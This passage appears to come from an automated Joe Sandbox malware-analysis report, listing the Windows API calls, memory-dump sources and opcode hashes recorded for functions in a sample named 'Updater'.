                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionRaise
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3997070919-0
                                                                                                                                                    • Opcode ID: 1bb335a3ab7e54bafc2c84e169f5c398ede53d0e8fe12081e099c706970fdd82
                                                                                                                                                    • Instruction ID: cd29202f8abe3eb4d5567a7482e6568900dd9d75fc9a1119ffb8b169587cf862
                                                                                                                                                    • Opcode Fuzzy Hash: 1bb335a3ab7e54bafc2c84e169f5c398ede53d0e8fe12081e099c706970fdd82
                                                                                                                                                    • Instruction Fuzzy Hash: E8B15B316106089FD719CF28C48ABA47BE0FF08369F6586D9EC99CF2A1C735E985CB40
                                                                                                                                                    APIs
                                                                                                                                                    • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00B40CBD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FeaturePresentProcessor
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2325560087-0
                                                                                                                                                    • Opcode ID: 85b069827f15066c8ceeaf3495d177332c1b89f68b7cf87201c9af10269661f2
                                                                                                                                                    • Instruction ID: 5bb40120e2194851d7d82892285d37a2762b26c3b7adfdf22a1a7fd4932d4344
                                                                                                                                                    • Opcode Fuzzy Hash: 85b069827f15066c8ceeaf3495d177332c1b89f68b7cf87201c9af10269661f2
                                                                                                                                                    • Instruction Fuzzy Hash: 3C41C3B1D11205DFDB28DFA9D9C56AABBF4FB04310F288CAAC915EB250D770AE44DB50
                                                                                                                                                    APIs
                                                                                                                                                    • BlockInput.USER32(00000001), ref: 00B9F622
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BlockInput
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3456056419-0
                                                                                                                                                    • Opcode ID: 9ce2807eaa31bc5cff81f0198d45e65a4b3e244040f2d377cdab10a6d271b9da
                                                                                                                                                    • Instruction ID: fe2b635024900d81600bc367b32787b8949c0b88a664d12bc4095dc00719360a
                                                                                                                                                    • Opcode Fuzzy Hash: 9ce2807eaa31bc5cff81f0198d45e65a4b3e244040f2d377cdab10a6d271b9da
                                                                                                                                                    • Instruction Fuzzy Hash: 35E012352002156FD710AF59D444AAAF7DCEF58760F008066F949C7251DAB4E9408BA4
                                                                                                                                                    APIs
                                                                                                                                                    • GetUserNameW.ADVAPI32(?,?), ref: 00B659D9
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: NameUser
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2645101109-0
                                                                                                                                                    • Opcode ID: 2554eb45a7964b6d0248f01c271d3d26dc768182598c5cdd2d9ec6afd7beda10
                                                                                                                                                    • Instruction ID: 604b725bac61ef83e206f088d572f16b834e4d5b9316344aef7d0b1ee06db29c
                                                                                                                                                    • Opcode Fuzzy Hash: 2554eb45a7964b6d0248f01c271d3d26dc768182598c5cdd2d9ec6afd7beda10
                                                                                                                                                    • Instruction Fuzzy Hash: 61C04CF5811118ABCB50DBA0EDC8DDD77BCBB04304F100255F502A2100EBB895449B10
                                                                                                                                                    APIs
                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_00020FAB,00B40A05), ref: 00B40FA4
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                    • Opcode ID: 1eaaee67045fcd69a7e24af31a98572adee33085ca1c1156ba7cf7226729ce8d
                                                                                                                                                    • Instruction ID: 6e789a74b4e9218cbd8e3efdca5125488cca6456eabc5f8e2a5a4bf4a8235b15
                                                                                                                                                    • Opcode Fuzzy Hash: 1eaaee67045fcd69a7e24af31a98572adee33085ca1c1156ba7cf7226729ce8d
                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 0
                                                                                                                                                    • API String ID: 0-4108050209
                                                                                                                                                    • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                                                    • Instruction ID: 263a3ceb04b01b1b513cacad4b34db7d2faa4ca095eb18e23c9e7ee211e415bb
                                                                                                                                                    • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                                                    • Instruction Fuzzy Hash: 56517AB06CC64457EF388929899DBBE23DADB52300F5809D9E482C7292CF05DF45F396
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 220724932319c208671cd3a685953bbc3cd7069c7fb4bc4cea7df2790ecd151d
                                                                                                                                                    • Instruction ID: ba0a902cf51598995adcf2f3ba8825c73afd1927229878b9c883043015b47cfa
                                                                                                                                                    • Opcode Fuzzy Hash: 220724932319c208671cd3a685953bbc3cd7069c7fb4bc4cea7df2790ecd151d
                                                                                                                                                    • Instruction Fuzzy Hash: FF62B170A0061ADBDF14DF64D881ABEB7F5FF44300F1481B9E82A9B291EB75DA41CB51
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 61d0f60f60707de165724d11ea251a706897e1b0a04ef7a60d96a13002a0d236
                                                                                                                                                    • Instruction ID: 838d27ea111b79e2dfb66c3177054ca5ba55eefa8849439523b1338613867c37
                                                                                                                                                    • Opcode Fuzzy Hash: 61d0f60f60707de165724d11ea251a706897e1b0a04ef7a60d96a13002a0d236
                                                                                                                                                    • Instruction Fuzzy Hash: 59323521E68F014DD7239634D86233AA688EFB73D5F55C367EC1AB6AA5EF29C5834100
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 625542788dfb0d2492062d3fdba9398f39be5fcf719abd0ece1bf2b4998ccec7
                                                                                                                                                    • Instruction ID: cb455477951612c01076f3835346084eae0443986babab557ebe4e18c5260f46
                                                                                                                                                    • Opcode Fuzzy Hash: 625542788dfb0d2492062d3fdba9398f39be5fcf719abd0ece1bf2b4998ccec7
                                                                                                                                                    • Instruction Fuzzy Hash: 7032D031A00247DBDF28CE68D4D467EB7E2EF45310F29C1FAD8AA9B691D634DD81CA05
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: bd746588b24babb4270363b984d71b07179ce561899f2a4724ddf3b7a59d4d36
                                                                                                                                                    • Instruction ID: ab1d2fa8de9dc4a250a22be3b163ea9dab163f5139b34ab1038d746659defa58
                                                                                                                                                    • Opcode Fuzzy Hash: bd746588b24babb4270363b984d71b07179ce561899f2a4724ddf3b7a59d4d36
                                                                                                                                                    • Instruction Fuzzy Hash: 3742BC716083509FC724DF24D881B6AB7F1FF84304F1489ADF48A9B2A2DB75E945CB92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 323db9accf14f3090eec3d0a87b25f30b364fe91438709469afbe282fd986862
                                                                                                                                                    • Instruction ID: 440657fb4098fabb350a27f2041e4b123325fa5c61981dc3a5cb4c9fd9bf32f2
                                                                                                                                                    • Opcode Fuzzy Hash: 323db9accf14f3090eec3d0a87b25f30b364fe91438709469afbe282fd986862
                                                                                                                                                    • Instruction Fuzzy Hash: 76E15E317011278BDF0CCA2E88B007E76E1EB9437179543ADAD67D73C4EA64DA24F6A0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b5b3e5219c24e38db487436f5840cf4e1437969e14af223875bf10b042f87811
                                                                                                                                                    • Instruction ID: feb56aa8d678c7903742b1d2b7be1510f51e3f65c53e693191c2b06852870016
                                                                                                                                                    • Opcode Fuzzy Hash: b5b3e5219c24e38db487436f5840cf4e1437969e14af223875bf10b042f87811
                                                                                                                                                    • Instruction Fuzzy Hash: 65F17E317011238BDF0C8A6E88B017E76E1EB9477175943ADAD67D73C4EA24DF24E6A0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 28e35ac769e7317f25c8d2f7079bfb7ba7f6bb36bb2429e733617ce6d81fc8a1
                                                                                                                                                    • Instruction ID: 53ac4240cc95f095f8a2c947aa664cafaa9cf66fb5a76be2c95e3acfec2f96c3
                                                                                                                                                    • Opcode Fuzzy Hash: 28e35ac769e7317f25c8d2f7079bfb7ba7f6bb36bb2429e733617ce6d81fc8a1
                                                                                                                                                    • Instruction Fuzzy Hash: 74E13D317012264BDF0CCA6D89B007E76E1EBA4371B5643ADA967D73C4EA24DE14F6A0
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 7cbbe73ece808e9d5b9b9da20c40a852e7b712b22a389c2efd1644321bfcc0cb
                                                                                                                                                    • Instruction ID: ebbb419f6bca847d89022c09d1b8a8b82ee60cfe6c6a10c9efd80298e2a5a52e
                                                                                                                                                    • Opcode Fuzzy Hash: 7cbbe73ece808e9d5b9b9da20c40a852e7b712b22a389c2efd1644321bfcc0cb
                                                                                                                                                    • Instruction Fuzzy Hash: 3421C6326205159BDB18CF79C8136BA73E5EB54310F158A6EE4A7C33D0DE35A904CB80
                                                                                                                                                    APIs
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00BA3674
                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00BA3687
                                                                                                                                                    • DestroyWindow.USER32 ref: 00BA3696
                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00BA36B1
                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00BA36B8
                                                                                                                                                    • SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00BA37E7
                                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00BA37F5
                                                                                                                                                    • CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA383C
                                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 00BA3848
                                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00BA3884
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38A6
                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38B9
                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38C4
                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00BA38CD
                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38DC
                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00BA38E5
                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA38EC
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00BA38F7
                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA3909
                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00BC0BEC,00000000), ref: 00BA391F
                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00BA392F
                                                                                                                                                    • CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00BA3955
                                                                                                                                                    • SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00BA3974
                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA3996
                                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00BA3B83
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                                    • Opcode ID: cd2f31cf20d2e122539a34cafd74f22700f3027eb31b6c82887463c3eaacf171
                                                                                                                                                    • Instruction ID: 538a7371a540e2061358bce4d6085fabd9f5e1c587e5570a32edbe9eaf3b41ce
                                                                                                                                                    • Opcode Fuzzy Hash: cd2f31cf20d2e122539a34cafd74f22700f3027eb31b6c82887463c3eaacf171
                                                                                                                                                    • Instruction Fuzzy Hash: 8D027F71500214EFDB14DF64DC89EAE7BF9EB49710F148298F915AB2A0DB78EE01CB64
                                                                                                                                                    APIs
                                                                                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00BB0288
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB029D
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00BB02DF
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB02F5
                                                                                                                                                    • IsWindowEnabled.USER32(?), ref: 00BB0331
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB0347
                                                                                                                                                    • _wcslen.LIBCMT ref: 00BB0394
                                                                                                                                                      • Part of subcall function 00B4014F: _wcslen.LIBCMT ref: 00B4015A
                                                                                                                                                      • Part of subcall function 00B82E91: SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00B82F15
                                                                                                                                                      • Part of subcall function 00B82E91: SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00B82F28
                                                                                                                                                      • Part of subcall function 00B82E91: SendMessageW.USER32(?,00000189,?,00000000), ref: 00B82F58
                                                                                                                                                      • Part of subcall function 00B82A02: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00B82A0D
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: _wcslen$MessageSend$Window$BuffCharEnabledUpperVisible
